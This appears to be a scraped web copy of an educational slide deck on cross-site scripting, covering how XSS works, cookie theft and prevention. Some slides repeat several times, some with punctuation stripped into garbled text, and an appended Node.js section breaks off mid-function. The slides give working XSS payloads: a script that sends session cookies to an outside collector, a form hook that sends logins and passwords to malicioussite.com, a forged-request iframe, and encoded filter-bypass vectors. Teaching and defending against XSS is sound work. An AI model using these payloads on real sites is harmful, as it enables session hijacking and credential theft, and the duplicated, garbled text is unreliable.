Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakage

Client can reveal cookies to a 3rd party (session state, order info, etc.):

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (userID/passwd, etc.):

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server:

www.trustedserver.com/xss.asp?name = <iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES:

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilities: Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]

Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats…
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistent…
  • Slide 13
  • Scripting Via Malicious Link…
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attacks…
  • By SURVEY…
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scripts…
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 16: Internet hacking presentation

16

Stealing User's COOKIE…

17

If any part of the Web site uses cookies, then it may be possible to steal them from its users. In this scenario the attacker posts a page with malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's Web site with the cookies gathered. Using this technique the attacker can gain sensitive data such as passwords, credit card numbers and any arbitrary information the user inputs.

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their site. If the embedded script code has the capability of further interaction with the legitimate server without alerting the victim, the attacker could develop and exploit that by posting data to a different page on the legitimate Web server.

20

By Scripting

21

Script can read all HTML content/tags in the other window.

Script can set/delete tags/content in the other window. We can read and set form values, then run a submit().

Script can set vars and call functions in the other window.

document.write can allow script to create new tags/content in the other window.

This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. We have full control of the other window as long as it's in the same document.domain.

If we can forward cookies, then we can also forward other JScript-accessible content to an attacker. We can forward page contents, form values (including hidden…), JScript vars/state, JScript errors.

22

Some FACTS about the XSS attacks…

23

By SURVEY…

1st Gen XSS was against public sites and ran against everyone that visited the site.

2nd Gen XSS focused on sites that allow self-reflection XSS.

24

• Cross-site scripting attacks are a special case of code injection.

• Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.

• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.

Dynamic XSS with 2-way comms (diagram): in the Victim Browser, the XSS against the site runs inside an IFRAME, where script commands run and other documents on the site are loaded; the XSS Vulnerable Server and the Attacker System are linked through <script src="attacker.com/innerHTML_of_IFRAME">, and the attacker system supplies new JScript… via <script src="attacker.com">.

26

Some prominent sites that have been affected in the past are…

The search engine Google; the email services of Google and Yahoo; the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.

Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.

27

By seeing all this, the question that arises is…

Then how can we prevent it?

28

Yes, some methods are there for prevention, and those are:
>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 17: Internet hacking presentation

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 18: Internet hacking presentation

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 19: Internet hacking presentation

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining purposes…

Remember the syntax…

34

SYNTAX
• Script injection in an image src tag
• Embed nested quotes: ' or " or \u0022 \u0027
• Keyword filters that allow any JS to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
• Limited input length + script block embed = unlimited script power (<script src=...>)
• SSL pages warn if the script src comes from an untrusted site, but if you can upload, say, an img that is actually JS commands…
• Methods of script encoding:
  <img src="vbscript:do%63ument.lo%63ation='http://a.b.com'">
  <IMG SRC="javascript:alert('test')">
  <IMG SRC="javasc ript:alert('test')"> (a tab or newline inside the keyword splits it for the filter but not for the browser)
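As an added example (not code from the original slides), the Node.js code below shows why the keyword filters this slide calls "useless" miss the vectors listed on it. The blacklist is a constructed stand-in for that kind of filter; browserAttributeView models the decoding steps a browser applies to a src attribute (character-reference decoding by the HTML parser, tab/newline stripping by the URL parser, percent-decoding of a javascript:/vbscript: body before execution); the payloads are built from the slide's own examples.

```javascript
// Added example (not code from the original slides): why the keyword filters
// that slide 34 calls "useless" miss the vectors listed there. The blacklist is
// a constructed stand-in for that kind of filter, and the browser-side
// normalisation below models the decoding steps a browser applies to a src
// attribute; the payloads are built from the slide's own examples.

// A naive server-side blacklist: strip a few dangerous words and schemes.
function naiveKeywordFilter(input) {
  return input
    .replace(/<script/gi, '')
    .replace(/javascript:/gi, '')
    .replace(/document\./gi, '')
    .replace(/navigator/gi, '');
}

// Model of how the browser sees a src attribute value before it decides
// whether it is a script URL.
function browserAttributeView(value) {
  // 1. The HTML parser decodes character references inside the attribute.
  let v = value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(Number(d)));
  // 2. The URL parser drops ASCII tab/newline anywhere and leading controls/space,
  //    which is why "javasc<TAB>ript:" still runs.
  v = v.replace(/[\t\n\r]/g, '').replace(/^[\x00-\x20]+/, '');
  // 3. For a javascript:/vbscript: URL the body after the scheme is percent-decoded
  //    before it is executed, which is why do%63ument becomes document.
  const m = /^([a-z][a-z0-9+.-]*):(.*)$/is.exec(v);
  if (!m) return v;
  let body = m[2];
  try { body = decodeURIComponent(body); } catch (e) { /* malformed escape: leave as-is */ }
  return m[1].toLowerCase() + ':' + body;
}

// src attribute values in the (already filtered) HTML that still resolve to a script scheme.
function liveScriptUrls(html) {
  const found = [];
  const re = /src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const view = browserAttributeView(m[1] ?? m[2] ?? m[3]);
    if (/^(javascript|vbscript):/.test(view)) found.push(view);
  }
  return found;
}

// True when the payload passes the blacklist and the browser would still execute it.
function survivesFilter(payload) {
  return liveScriptUrls(naiveKeywordFilter(payload)).length > 0;
}

// The slide's A='navi'; B='gator.userAgent'; eval(A+B) trick: the blacklisted
// identifier never appears in the submitted text, only at run time.
function evalConcatBypass() {
  const submitted = "var A='navi', B='gator.userAgent'; A + B";
  const filtered = naiveKeywordFilter(submitted);   // unchanged: no banned word present
  return eval(filtered);                             // the banned identifier is assembled here
}
```

Of the four image payloads, only the plain `javascript:` form is caught; the tab-split, entity-encoded and percent-encoded forms all reach the browser intact, and `evalConcatBypass()` returns the string `navigator.userAgent` that the filter never saw. The fix is not a longer blacklist but the context-aware output encoding described on slide 29.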

35

Types of information leakage

Client can reveal cookies to a 3rd party (session state, order info, etc.):

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (userID/passwd, etc.):

<form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>

Client can be tricked into accessing/posting spoofed info to the trusted server:

www.trustedserver.com/xss.asp?name = <iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>
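The three leakage patterns above leave traces in the web server's own access log when the payload arrives in a reflected URL. As an added example (not code from the original slides), the Node.js code below parses constructed Apache "combined" log lines and flags the requests carrying the slide's vectors. The log lines, client addresses, paths and signature names are all invented for the example.

```javascript
// Added example (not code from the original slides): a small detector for the
// reflected-XSS request patterns shown on slide 35, run over constructed
// web-server access-log lines in Apache "combined" format. Client addresses,
// timestamps and paths are invented for the example.

const SAMPLE_LOG = [
  `10.0.0.5 - - [12/Mar/2009:10:01:02 +0000] "GET /a.php?variable=%22%3E%3Cscript%3Edocument.location=%27http://www.cgisecurity.com/cgi-bin/cookie.cgi?%27%20+document.cookie%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/4.0"`,
  `10.0.0.5 - - [12/Mar/2009:10:01:09 +0000] "GET /xss.asp?name=%3Ciframe%20src=http://www.trustedserver.com/auth_area/orderupdate?items=4000%3E%3C/iframe%3E HTTP/1.1" 200 734 "-" "Mozilla/4.0"`,
  `10.0.0.7 - - [12/Mar/2009:10:02:00 +0000] "GET /a.php?variable=hello%20world HTTP/1.1" 200 300 "-" "Mozilla/4.0"`,
  `10.0.0.9 - - [12/Mar/2009:10:03:00 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 300 "-" "Mozilla/4.0"`,
];

// client, identd, user, [time], "method target protocol", status, ...
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
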